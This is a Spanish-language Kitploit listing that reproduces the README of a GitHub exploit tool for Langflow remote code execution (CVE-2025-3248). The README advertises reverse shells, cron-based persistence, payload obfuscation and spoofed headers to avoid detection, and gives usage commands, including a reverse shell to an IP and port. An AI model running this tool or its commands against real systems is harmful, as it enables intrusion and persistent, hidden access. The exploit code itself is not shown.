Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
langflow-rce-exploit — Exploit de Ejecución Remota de Código para Langflow (CVE-2025-3248) - [ Por S4Tech ] | Kitploit
Herramientas/GitHubGitHub/0-d3y/langflow-rce-exploit
Escalada de PrivilegiosMecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed TeamingHerramienta de Acceso RemotoDesarrollo de Payloads
71hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

Exploit de Ejecución Remota de Código para Langflow (CVE-2025-3248) - [ Por S4Tech ]

Ver Repositorio

Exploit RCE de Langflow (CVE-2025-3248)

Python Version License Platform

Exploit de Ejecución Remota de Código para Langflow (CVE-2025-3248)

Características

  • Detección automática de vulnerabilidades
  • Múltiples modos de explotación:
    • Shell interactivo
    • Ejecución de un solo comando
    • Conexión reverse shell
  • Capacidad de subida de archivos
  • Interfaz de usuario coloreada
  • Múltiples métodos de reverse shell
  • Persistencia del historial de comandos

📌 Registro de cambios (v2.0)

✨ Nuevas características:

  • Sistema de payload avanzado con 5 métodos de ejecución
  • Subida/descarga de archivos con codificación Base64
  • Persistencia mediante tareas cron (comando persist)
  • Mejoras en la shell interactiva:
    • upload local_path remote_path
    • download remote_path local_path
    • comando clear para terminal

🛡️ Mejoras de seguridad:

  • Ofuscación automática del payload (Base64 + variantes aleatorias)
  • Rotación de cabeceras por solicitud:
    • User-Agent aleatorio
    • Direcciones IP X-Forwarded-For falsificadas
  • Omisión de HTTPS (soporte para certificados autofirmados)
  • Sin redirecciones para evitar detección

⚡ Mejoras técnicas:

  • Verificación de vulnerabilidad en múltiples etapas
  • Manejo de errores mejorado para conexiones inestables
  • Registro completo de sesión en exploit_log.txt
  • Persistencia del historial de comandos (.langflow_shell_history)

📊 Comparación de versiones:

🐛 Correcciones de errores:

  • Se corrigieron problemas de conexión HTTPS
  • Mejor manejo de caracteres especiales en comandos
  • Se estabilizó la fiabilidad de la reverse shell

Requisitos

  • Python 3.6 o superior
  • Librerías necesarias:
    • requests
    • colorama
    • readline

Instalación

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

Uso

root@kitploit:~
python exploit.py <URL> [options]

Opciones disponibles:

Ejemplos:

  1. Verificar vulnerabilidad:
root@kitploit:~
python exploit.py http://target.com
  1. Iniciar shell interactiva:
root@kitploit:~
python exploit.py http://target.com --shell
  1. Ejecutar un solo comando:
root@kitploit:~
python exploit.py http://target.com --command "whoami"
  1. Lanzar reverse shell:
root@kitploit:~
python exploit.py http://target.com --reverse 192.168.1.100 4444

Capturas de pantalla

Image.png)

Advertencia

âڑ ï¸ڈ Esta herramienta es solo para fines educativos y de pruebas autorizadas.
âڑ ï¸ڈ El uso no autorizado contra sistemas que no posees o para los que no tienes permiso de prueba es ilegal.

Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.

Autor

  • Mr.SaMi
    Twitter
    Instagram

Contribuciones

Las solicitudes de extracción son bienvenidas. Para cambios importantes, abra primero un issue para discutir lo que le gustaría cambiar.

Descargar herramienta
Característicav1.0v2.0
Métodos de payload15
Transferencia de archivos❌ No soportada✅ Soportada
Persistencia❌✅
Nivel de sigiloBásicoAvanzado
Registro de sesión❌✅
OpciónDescripción
--shellInicia una shell interactiva
--reverse IP PORTLanza una reverse shell a la IP:PUERTO especificada
--command CMDEjecuta un solo comando
--verboseHabilita salida detallada
--timeout SECEstablece tiempo de espera de solicitud (predeterminado: 10s)